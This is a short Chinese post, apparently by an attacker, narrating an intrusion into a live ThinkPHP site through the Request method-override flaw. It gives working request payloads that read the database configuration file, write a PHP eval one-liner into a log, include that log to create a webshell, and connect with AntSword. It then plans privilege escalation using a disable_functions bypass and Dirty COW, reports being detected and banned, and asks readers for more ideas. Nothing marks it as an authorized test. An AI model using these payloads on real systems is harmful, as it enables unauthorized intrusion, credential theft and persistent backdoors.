主要是thinkphp\library\think\request.php中的method函数出现的问题
在Method方法中 将表单伪装变量对该方法的变量进行覆盖,可以实现对该类的所有函数进行调用。
首先从url中的pub路径大致就可以判断出是thinkphp的框架
我们让他报个错看看
路径和版本号都显示出来了
网上可以搜索公开的漏洞利用方式,
_method=__construct&method=GET&filter[]=readfile&get[]=../application/database.php
读取数据库配置文件
method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['1']);?>
往log文件中写入一句话
method=__construct&method=get&filter[]=think\__include_file&get[]=../runtime/log/202007/28.log&
1=file_put_contents('a.php','<?php eval($_POST[1]);?>');
执行一句话生成php木马
蚁剑连接webshell
数据库的阿里云的设置了白名单所以访问不了,考虑下一步提权
该站点使用的宝塔对一些系统的命令做了禁止虚拟终端执行不了命令
可以利用php7的php7-backtrace-bypass https://github.com/mm0r1/exploits 来进行绕过
这个我之前利用的时候是可以的,但是这次我被发现了 把webshell给我删了,ip也给我ban了,开了代理还是 被删了。
我在阿里云搭了一个1:1的环境模拟一下想试一下脏牛提权,结果也被阿里云ban了,大佬们有什么思路可以分享一下啊。